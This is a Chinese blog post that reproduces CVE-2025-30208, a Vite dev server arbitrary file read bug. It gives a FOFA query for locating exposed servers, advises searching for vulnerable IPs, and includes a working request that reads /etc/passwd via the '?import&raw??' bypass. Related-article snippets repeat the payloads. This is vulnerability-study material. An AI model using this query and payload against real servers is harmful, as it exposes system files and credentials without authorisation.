CVE-2025-30208（文件读取）漏洞复现

CVE-2025-30208文件读取漏洞复现

最新推荐文章于 2025-08-21 07:57:37 发布

每天一杯月亮

最新推荐文章于 2025-08-21 07:57:37 发布

阅读量1k

点赞数 1

CC 4.0 BY-SA版权

文章标签：安全网络安全网络

本文链接：https://blog.csdn.net/ljh123321ljh/article/details/146726301

一：漏洞信息

CVE-2025-30208是Vite开发服务器中存在的一个高危逻辑漏洞，允许攻击者通过构造特殊的URL绕过文件访问限制，读取服务器上的任意文件（如配置文件、密钥、数据库凭据等）。

二：漏洞原理

漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数（**如?raw??或?import&raw??**）时，Vite对URL尾部分隔符（如?和&）的正则匹配不严格，导致安全检查被绕过。

三：漏洞复现

1.fofa：body="/@vite/client"

poc：GET /@fs/etc/passwd?import&raw?? HTTP/1.1
Host: xx.xx.xx.xx

2.在fofa搜索，寻找存在漏洞ip

3.尝试传参，得到相关信息。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

每天一杯月亮

关注关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Vite 存在任意文件读取漏洞(CVE-2025-30208)

qq_43540348的博客

03-27

1324

Vite 是一个面向现代 Web 开发的轻量级前端构建工具，由 Vue.js 作者尤雨溪团队打造。它基于原生 ES 模块（ESM）提供极速的开发服务器启动和热更新，利用浏览器原生支持的特性实现按需编译，无需打包，显著提升开发效率。生产环境则通过 Rollup 进行高效构建，支持 TypeScript、JSX、CSS 预处理器等主流工具链，同时提供丰富的插件生态。Vite 以"快"为核心，重新定义了前端开发体验，尤其适合单页应用（SPA）、库工具等场景。

CVE-2025-30208 Vite开发服务器任意文件读取漏洞复现

渗透之路，攻防之间皆学问

04-10

1779

Vite 是一个现代化的前端构建工具，由 Vue.js 创始人尤雨溪开发，旨在提供更快的开发体验和高效的构建流程。注意：旧版本Vite的开发服务器默认端口为3000，新版本默认端口为5173，请注意区分。此漏洞的存在是由于在处理URL请求时，Vite开发服务器未严格验证路径，导致未经身份验证的攻击者可以构造特殊的URL来获取项目根目录之外的敏感文件。需要注意的是，只有那些明确将Vite开发服务器暴露到网络（使用--host或server.host配置选项）的应用程序才会受到此漏洞的影响。

参与评论您还未登录，请先登录后发表或查看评论

用友ERP-CVE-2025-2709-2710-2711-2712

热门推荐

weixin_46483787的博客

07-01

1万+

CVE-2021-3156复现笔记

Vite-CVE-2025-30208漏洞复现与漏洞分析

worldanswer的博客

04-03

911

Vite任意文件读取漏洞CVE-2025-30208

Vite CVE-2025-30208 安全漏洞

guoqkmiss的博客

03-27

815

CVE-2025-30208 是 Vite（一个前端开发工具提供商）在特定版本中存在的安全漏洞。此漏洞允许攻击者通过特殊的 URL 参数绕过对文件系统的访问限制，从而获取任意文件内容（包括非 Vite 服务目录范围外的文件）。

Vite存在任意文件读取漏洞(CVE-2025-30208)

缘梦未来的博客

03-26

395

Vite 是一款现代化的前端开发构建工具，它提供了快速的开发服务器和高效的构建能力，广泛应用于 Vue.js 项目的开发过程中

CVE-2025-31486 Vite开发服务器任意文件读取漏洞复现

渗透之路，攻防之间皆学问

04-11

939

该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时，未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制，未经授权地访问项目根目录之外的敏感文件。

Vite存在任意文件读取漏洞CVE-2025-30208 附POC

nnn2188185的博客

03-27

331

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发Vite框架。

最新！！！ CVE-2025-30208-Vite 安全漏洞

ZzzzZ123486的博客

03-28

598

本工具用于检测目标系统是否存在 CVE-2025-30208 漏洞。该漏洞允许攻击者通过特定路径读取服务器上的敏感文件（如 /etc/passwd 或 C:\windows\win.ini）。工具支持单个 URL 检测和批量检测，并可选使用 HTTP/HTTPS 代理。这里介一下payload?raw??和?import?raw??的关系。第一个payload适用于读取不带后缀的文件，第二个随意了。

【漏洞复现】Vite 任意文件读取漏洞 CVE-2025-30208/CVE-2025-31125/CVE-2025-31486/CVE-2025-32395

仇辉攻防的博客

04-13

2138

Vite 和 Next.js 是两个不同类型的前端工具，它们各自的用途、架构和适用场景有所不同。Vite 是一个现代前端构建工具，主要用于开发和打包前端项目（如 Vue、React 等）。它由 Vue 的作者 Evan You 开发，核心特点是快速启动、按需编译，并且基于 ES 模块（ESM）。Vite 适用于构建前端 SPA（单页应用），并不包含服务端渲染（SSR）或全栈开发能力。

Vite 任意文件读取漏洞分析复现 CVE-2025-30208

misu6的博客

03-27

3250

Vite是前端开发工具提供商，在6.2.3、6.1.2、6.0.12、5.4.15和4.5.10之前的版本中存在漏洞。'@fs ‘拒绝访问Vite服务允许列表之外的文件。添加’？生的？？‘或者’？进口和原料？？'到URL绕过此限制并返回文件内容（如果存在）。存在此绕过是因为尾随分隔符，例如“？”在多个地方被删除，但不在查询字符串regex中考虑。任意文件的内容都可以返回到浏览器。只有将Vite dev服务器显式暴露给网络（使用“–Host”或“server. Host”配置选项）的应用程序才会受到影响。

Web安全和渗透测试有什么关系？

Python_0011的博客

03-31

3681

做渗透测试的一个环节就是测试web安全，需要明白漏洞产生原理，通过信息收集互联网暴露面，进行漏洞扫描，漏洞利用，必要时进行脚本自编写和手工测试，力求挖出目标存在的漏洞并提出整改建议，当然如果技术再精一些，还要学习内网渗透（工作组和域环境），白盒审计，app，小程序渗透那些了......可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。总之，web安全包含于渗透测试，但不是渗透测试的全部。

【CVE-2025-30208】| Vite-漏洞分析与复现

摘星怪sec的blog

03-28

4160

漏洞简介漏洞简介CVE-2025-30208 是 Vite 开发服务器中的一个任意文件读取漏洞。该漏洞允许攻击者通过特定的 URL 参数绕过访问控制，从而读取服务器上的敏感文件（如或。

图片服务器

whinsist的专栏

07-05

317

1.图片服务器源码 2.图片服务器tomcat配置（tomcat/config/web.xml） default org.apache.catalina.servlets.DefaultServlet debug 0

【漏洞复现】CVE-2025-33073｜Windows SMB 权限提升漏洞

信安百科

06-28

726

CVE-2025-33073漏洞存在于Windows SMB中，允许已认证的远程攻击者在未经强制SMB签名的机器上，通过篡改DNS记录强制目标主机进行本地认证反射，最终以SYSTEM权限执行任意命令。

Vite 任意文件读取漏洞复现（CVE-2025-31125）

iSee857的博客

04-03

605

漏洞源于 Vite 在处理带有特定查询参数的 URL 时，正则表达式和参数处理逻辑存在缺陷，导致安全检查被绕过。攻击者利用这一缺陷，通过精心构造的请求路径，访问服务器上不在允许访问列表中的文件。（CVE-2025-31125）

Vite 存在任意文件读取漏洞(CVE-2025-31125)

m0_50125527的博客

04-02

458

MySQL漏洞CVE-2025-21521

07-12

同时，我们注意到用户提供的引用中包含了几个漏洞复现的例子，如CVE-2012-2122（MySQL身份认证绕过漏洞）等。我们可以参考这些已知漏洞的特点来构建我们的回答。假设漏洞：CVE-2025-21521 是一个基于堆栈的缓冲...